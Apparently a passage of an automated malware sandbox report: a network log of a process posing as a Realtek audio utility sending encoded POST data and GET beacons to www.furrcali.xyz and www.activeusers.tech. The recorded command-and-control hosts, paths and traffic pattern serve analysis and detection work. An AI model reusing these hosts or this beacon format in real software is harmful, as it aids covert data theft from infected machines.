                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:55:00 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.11.2049730103.106.67.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:03.399182081 CET2578OUTPOST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 43 73 69 43 6e 68 6c 45 59 38 41 6c 76 66 30 79 31 68 49 45 51 73 73 58 46 6c 59 42 47 52 78 70 6b 47 67 75 52 71 4d 37 6b 71 53 55 4e 4e 61 56 4b 49 79 33 64 46 4f 58 36 69 38 77 37 69 76 47 44 73 31 77 47 73 6a 74 4b 66 54 35 4c 6f 64 59 44 45 49 79 46 51 30 31 30 6e 75 41 48 57 52 61 5a 75 79 6e 4a 67 6c 37 63 52 2f 49 6b 6f 59 57 6c 4e 54 62 2f 69 65 75 42 4a 47 7a 63 4d 62 58 44 6b 70 71 41 76 6a 6a 4e 64 6b 68 4e 30 4b 49 70 4b 37 78 35 6f 76 7a 6c 69 6d 50 65 33 42 4d 72 68 4c 4b 4c 47 73 5a 74 41 5a 76 46 49 77 77 31 46 4f 6f 6c 31 47 41 78 71 68 73 4a 55 7a 34 4e 43 45 69 46 70 32 73 75 59 72 64 4d 77 77 41 4f 63 57 6f 6b 2b 2f 63 45 77 47 36 32 6f 76 36 31 58 64 74 32 6b 76 6d 72 39 67 70 43 4d 72 75 41 41 2b 4b 61 38 6c 5a 33 36 73 75 68 42 34 48 44 77 48 66 72 51 46 68 34 46 69 6f 69 31 35 69 64 31 4f 54 62 33 51 56 39 4e 75 39 75 67 64 31 78 62 74 44 4e 52 6b 77 53 4e 51 49 38 4b 42 63 4c 6b 57 51 42 31 6c 4a 76 70 72 6a 4a 33 30 72 6c 71 4f 56 38 58 46 33 79 55 58 6d 42 38 37 [TRUNCATED]
                                                                                        Data Ascii: Sb=CsiCnhlEY8Alvf0y1hIEQssXFlYBGRxpkGguRqM7kqSUNNaVKIy3dFOX6i8w7ivGDs1wGsjtKfT5LodYDEIyFQ010nuAHWRaZuynJgl7cR/IkoYWlNTb/ieuBJGzcMbXDkpqAvjjNdkhN0KIpK7x5ovzlimPe3BMrhLKLGsZtAZvFIww1FOol1GAxqhsJUz4NCEiFp2suYrdMwwAOcWok+/cEwG62ov61Xdt2kvmr9gpCMruAA+Ka8lZ36suhB4HDwHfrQFh4Fioi15id1OTb3QV9Nu9ugd1xbtDNRkwSNQI8KBcLkWQB1lJvprjJ30rlqOV8XF3yUXmB874CSqyonkKLtogMUei1XQl2a4BXPikLXWHhOLBNpbNQ6gXfgv/Tc9gPT5rgT9R392TmUJfvc0Y/wJZLjdVg9O7z6cNi4EhCK8D9HRx0XYAJqouxUo8s+1PIbziyp9j36RiY9VMiBMQ0NYSxkHNTpQRFW0UsHE9Oh9hZ7EF+GvvX8OOltNurDPs+9K2sWcAAeMt/kJBe9ghPIQGeB+EZSGVxfnc+WsaYPhE0TE3NcwQ7+HLM+zMBVrDaVTKtne/I/JxPCz8ta2ckVQhi6m7/L5DzhY0t5la40ZFt8g9/ZOwQYgbZhBqhsB8uCsdXv89Lezhyndv9/xra9CH7bni21h3xQLmL+X3dEo0TDaLTY/q9TFAnl5HF9qd4F+mw2UCQlKUl/Oa5v1JSUomDe13GDonhnbUI02r7f7GVdIblH+6rxoJ1V+6ojp7aMspAXu/1ZHO8+A7gOP6Tgn0pe4hVWBvJglC/XoZy/LkZLki7T8cS963pieh6A15NLmHmZkwNuODKdHBczR+hB5hI57pd/ZHw3Qk9uPi5UXELhGcdyxU+/4VrBXPb/igh/P1ds2chcJJVXlQNhmKsxKbE3sZh6NyPuua3fD1Xg6LIGB1lyaJfCsdkzg9z17uz0vxzBzSBgpoFO38o1Os9S54RGVu40QjKm+YuZkvVCKGd [TRUNCATED]
                                                                                        Dec 12, 2024 21:55:03.399267912 CET5235OUTData Raw: 67 69 6f 43 6b 77 37 62 76 46 76 6d 31 71 37 6a 32 2f 38 79 67 49 4d 52 48 75 7a 55 54 34 2f 45 32 6a 4f 71 67 4d 45 77 38 37 72 77 6a 42 78 33 53 38 65 37 43 44 43 59 4d 55 2b 59 55 57 67 43 37 52 4c 53 5a 51 6c 63 6d 55 4f 56 68 70 55 37 57 33
                                                                                        Data Ascii: gioCkw7bvFvm1q7j2/8ygIMRHuzUT4/E2jOqgMEw87rwjBx3S8e7CDCYMU+YUWgC7RLSZQlcmUOVhpU7W3sNO0q58k0fVi/sY5JPAUhihaV8rQfFlDE5EvGX3qWRonPIbWzNP3bHLIP8CqzJZ4mI0cqOLknvCF1JpOSNNnqBKkjlpBNUtdFgwN4TKo+1GTUau79SiYmfdUYRV+Ucfyjjn1edHEiES5lGR0E9vzAjFfClD3r/RQ2
                                                                                        Dec 12, 2024 21:55:03.559663057 CET204INHTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:55:03 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.11.2049731103.106.67.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:06.087656975 CET382OUTGET /86f0/?Sb=PuKikXorY4oo6Pd4yxwUW5NofTFUIXhFjDlOX4M2s/L5J9SfDLPGQlnn7RwJ6yyFAuMFatCqAdXGLq9bXHIsbHEK0zn8CXVXTea1ExwfCjX9qoJAsvLL/QI=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:06.248677969 CET204INHTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:55:06 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.11.2049732199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:11.547008991 CET656OUTPOST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 64 54 46 76 5a 32 56 50 6e 59 69 52 6f 58 63 77 78 56 43 61 6b 4a 73 69 73 65 59 57 47 47 6b 2f 70 33 32 43 78 74 71 78 55 65 33 30 56 59 42 6c 39 63 73 75 39 72 46 50 59 72 77 66 4c 37 46 4a 4c 30 39 31 7a 51 34 6a 6a 4c 36 6f 78 45 58 36 71 6b 31 6a 67 69 74 39 51 6a 59 33 62 42 6a 37 6c 56 56 6c 69 2f 38 54 77 6a 64 44 57 77 68 2f 4d 4b 64 56 66 67 4e 6a 41 61 4d 6b 38 45 56 35 52 68 66 63 62 66 53 7a 62 67 61 75 76 57 6e 61 6b 67 39 48 4d 71 31 73 31 51 53 6d 71 6f 71 74 2b 76 38 58 38 72 2f 4e 30 43 31 34 68 68 6b 59 53 65 44 46 68 61 43 6c 73 6c 34 62 66 38 39 53 6f 51 3d 3d
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRoXcwxVCakJsiseYWGGk/p32CxtqxUe30VYBl9csu9rFPYrwfL7FJL091zQ4jjL6oxEX6qk1jgit9QjY3bBj7lVVli/8TwjdDWwh/MKdVfgNjAaMk8EV5RhfcbfSzbgauvWnakg9HMq1s1QSmqoqt+v8X8r/N0C14hhkYSeDFhaClsl4bf89SoQ==
                                                                                        Dec 12, 2024 21:55:11.677968979 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:10 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: e855e1e9-c412-4730-885d-b63f614aa460
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=e855e1e9-c412-4730-885d-b63f614aa460; expires=Thu, 12 Dec 2024 21:10:11 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 2f 66 52 35 71 51 57 52 31 78 44 70 74 54 2b 44 6d 59 53 53 59 52 2f 32 56 4a 51 2b 56 55 49 32 34 30 39 66 34 30 4f 6f 53 54 41 41 65 33 66 58 7a 56 6c 61 49 68 58 63 78 6c 56 75 73 37 4c 75 53 45 39 56 56 77 58 4a 75 58 53 59 6e 4d 4d 35 41 56 61 61 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:11.677985907 CET534INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTg1NWUxZTktYzQxMi00NzMwLTg4NWQtYjYzZjYxNGFhNDYwIiwicGFnZV90aW1lIjoxNzM0MDM2OTExLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.11.2049733199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:14.195770979 CET676OUTPOST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 64 54 46 76 5a 32 56 50 6e 59 69 52 71 33 4d 77 33 79 65 61 31 5a 73 6c 6a 2b 59 57 4d 6d 6b 37 70 33 36 43 78 70 79 62 55 73 44 30 57 38 46 6c 38 64 73 75 30 37 46 50 51 4c 77 67 50 37 46 65 4c 30 67 4b 7a 54 67 6a 6a 4c 75 6f 78 42 72 36 71 53 39 67 6d 79 74 6a 4a 7a 59 31 55 68 6a 37 6c 56 56 6c 69 37 55 31 77 6a 46 44 57 42 52 2f 4d 72 64 57 53 41 4e 67 48 61 4d 6b 72 55 56 31 52 68 65 6d 62 65 65 56 62 6d 57 75 76 54 6a 61 6b 56 52 45 47 71 31 6d 34 77 54 4e 6a 36 61 6b 34 63 4e 71 7a 71 4c 42 77 41 42 62 70 58 70 43 50 73 33 68 69 4a 65 58 6f 56 42 7a 64 2b 38 4a 31 52 34 5a 49 5a 66 44 30 61 32 65 6d 46 6a 49 38 54 49 54 54 32 34 3d
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRq3Mw3yea1Zslj+YWMmk7p36CxpybUsD0W8Fl8dsu07FPQLwgP7FeL0gKzTgjjLuoxBr6qS9gmytjJzY1Uhj7lVVli7U1wjFDWBR/MrdWSANgHaMkrUV1RhembeeVbmWuvTjakVREGq1m4wTNj6ak4cNqzqLBwABbpXpCPs3hiJeXoVBzd+8J1R4ZIZfD0a2emFjI8TITT24=
                                                                                        Dec 12, 2024 21:55:14.327230930 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:13 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: c259870e-9aca-4097-bf9f-f7fedc26a230
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=c259870e-9aca-4097-bf9f-f7fedc26a230; expires=Thu, 12 Dec 2024 21:10:14 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 2f 66 52 35 71 51 57 52 31 78 44 70 74 54 2b 44 6d 59 53 53 59 52 2f 32 56 4a 51 2b 56 55 49 32 34 30 39 66 34 30 4f 6f 53 54 41 41 65 33 66 58 7a 56 6c 61 49 68 58 63 78 6c 56 75 73 37 4c 75 53 45 39 56 56 77 58 4a 75 58 53 59 6e 4d 4d 35 41 56 61 61 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:14.327280045 CET534INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzI1OTg3MGUtOWFjYS00MDk3LWJmOWYtZjdmZWRjMjZhMjMwIiwicGFnZV90aW1lIjoxNzM0MDM2OTE0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.11.2049734199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:16.838540077 CET2578OUTPOST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 64 54 46 76 5a 32 56 50 6e 59 69 52 71 33 4d 77 33 79 65 61 31 5a 73 6c 6a 2b 59 57 4d 6d 6b 37 70 33 36 43 78 70 79 62 55 73 62 30 57 50 4e 6c 39 2b 55 75 75 37 46 50 61 72 77 68 50 37 46 66 4c 30 35 44 7a 54 73 4a 6a 4a 57 6f 77 6e 2f 36 73 67 56 67 6f 79 74 6a 55 6a 59 77 62 42 6a 55 6c 56 6c 70 69 2f 77 31 77 6a 46 44 57 43 35 2f 62 71 64 57 42 51 4e 6a 41 61 4d 53 38 45 56 5a 52 68 32 63 62 65 61 6a 62 57 32 75 76 7a 7a 61 2f 44 46 45 41 36 31 67 39 77 54 56 6a 36 58 38 34 63 51 54 7a 70 58 34 77 48 39 62 71 69 63 45 56 65 44 4c 2f 59 65 4d 30 33 4a 34 64 39 67 45 38 54 63 58 4d 4b 72 32 79 75 79 6e 6e 6e 6d 42 70 41 51 59 43 6d 51 30 2b 6e 57 64 47 62 52 32 7a 50 4d 31 6d 5a 63 70 6f 53 73 47 76 45 4d 78 45 4c 73 4b 4c 6b 4d 31 62 69 44 62 34 33 72 33 74 48 64 36 47 46 64 2f 55 70 56 68 42 4a 39 30 74 47 69 6c 77 47 66 53 76 4f 64 67 6b 52 43 48 6c 7a 6e 50 64 67 37 61 53 59 45 6f 6b 35 35 65 43 74 4c 4a 44 73 71 49 58 2f 69 35 49 30 49 57 45 37 4a 4f 70 6e 4b 6e 47 79 6c 76 5a 7a 32 [TRUNCATED]
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRq3Mw3yea1Zslj+YWMmk7p36CxpybUsb0WPNl9+Uuu7FParwhP7FfL05DzTsJjJWown/6sgVgoytjUjYwbBjUlVlpi/w1wjFDWC5/bqdWBQNjAaMS8EVZRh2cbeajbW2uvzza/DFEA61g9wTVj6X84cQTzpX4wH9bqicEVeDL/YeM03J4d9gE8TcXMKr2yuynnnmBpAQYCmQ0+nWdGbR2zPM1mZcpoSsGvEMxELsKLkM1biDb43r3tHd6GFd/UpVhBJ90tGilwGfSvOdgkRCHlznPdg7aSYEok55eCtLJDsqIX/i5I0IWE7JOpnKnGylvZz2X8McU+IDfsVtuQjKQL5X/jNRiyYeSFSxCnhKmSaqKEuI/autqGSzMGhnMtDRf0s5c7/Nr23hNwRt0jTz3RSSQ4qvjmnntBObMMlPPUAEQeDlGVuOXkgkm4qxFs6N8SGCGObTKHqG+k14oM1O7C5FzYdMm+U6jzTxNBEYWEnlfckIvrNNIF6Gq0CVL9W4RQ/MX9qgAQ5A6Osi3o798c4/687+fdUESUsNPC5IEhTKeaZkkTu+Tq/bevk0MMgwzYDVLvr6tMNfWhIwUwSdmABogS++qwBGyjNrb66WWOBzhxfJaV3aYLZvA7knY/u/rBhEp2YB+laFVHaSRTaf23Y0mhlaNT3ISbF29kliYMTwpsmNxn2ELED6tixahnbqa26U1GhbMLrxO1+0g6fJZqyKDeto4Jphv2NIka00koI7WgOIn3RQSURqc3Tt+JwIuqD2aW6bBXxvIQobQ0gmiERuBHPPDoSUs2ECTcyOhoHSDl+7HFW4v1cvEd5XkmwMTI/w8Y9DUkY6gmqYfLRbZUK3/jyVvRjGne9hXUYILlJ+3BpSY0xAtrUE7snNxzVOOxRN33iLvGpW9lxRIw5X8Kq/5FpE8XkfUxU++JFZWZMHE/w/Dh9nK6xnlowltBDrn1WmdGLukONjnySZDI7rkjg1FwsZVZwn/n28K9 [TRUNCATED]
                                                                                        Dec 12, 2024 21:55:16.838594913 CET5156OUTData Raw: 58 58 59 70 31 77 68 41 4d 4f 63 56 43 65 7a 66 47 6d 4a 37 54 69 50 54 2f 4e 65 56 59 43 4f 69 35 35 71 67 65 2b 77 6c 74 61 74 65 42 36 42 7a 39 32 61 46 59 55 70 45 39 66 56 64 76 67 47 48 38 32 2f 4b 6a 6b 62 68 67 64 65 76 63 59 67 2b 4e 38
                                                                                        Data Ascii: XXYp1whAMOcVCezfGmJ7TiPT/NeVYCOi55qge+wltateB6Bz92aFYUpE9fVdvgGH82/KjkbhgdevcYg+N8TQfBhIYQCi0FEKAreW7js+Fn7z4LmNhSIDQsGul+XR6KfJQcX/XOMBm4iEgNaLxp6Ldksr9CVPo4QT4rMx1sk4fdfsSdLA2PfPr9TLXknm4LNwiE2pkqECeM7M33ao41CdIzvSPAHgJiEckR2jzJ7xZ/rADLH67bN
                                                                                        Dec 12, 2024 21:55:16.838669062 CET91OUTData Raw: 48 43 49 42 48 32 35 53 4a 38 51 77 6b 72 4f 31 33 41 66 36 56 57 69 69 2b 6f 50 49 52 73 43 51 6f 5a 47 31 67 69 39 4a 6f 78 43 51 64 6a 2b 39 54 51 51 66 53 32 37 54 51 35 57 39 54 43 48 45 73 5a 75 41 4f 4d 76 38 62 33 6f 43 6a 77 2b 36 37 4b
                                                                                        Data Ascii: HCIBH25SJ8QwkrO13Af6VWii+oPIRsCQoZG1gi9JoxCQdj+9TQQfS27TQ5W9TCHEsZuAOMv8b3oCjw+67KlyXO+9A==
                                                                                        Dec 12, 2024 21:55:16.969772100 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:16 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: 6d9b8c58-a4a7-4c05-a87e-37a708d12063
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=6d9b8c58-a4a7-4c05-a87e-37a708d12063; expires=Thu, 12 Dec 2024 21:10:16 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 2f 66 52 35 71 51 57 52 31 78 44 70 74 54 2b 44 6d 59 53 53 59 52 2f 32 56 4a 51 2b 56 55 49 32 34 30 39 66 34 30 4f 6f 53 54 41 41 65 33 66 58 7a 56 6c 61 49 68 58 63 78 6c 56 75 73 37 4c 75 53 45 39 56 56 77 58 4a 75 58 53 59 6e 4d 4d 35 41 56 61 61 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
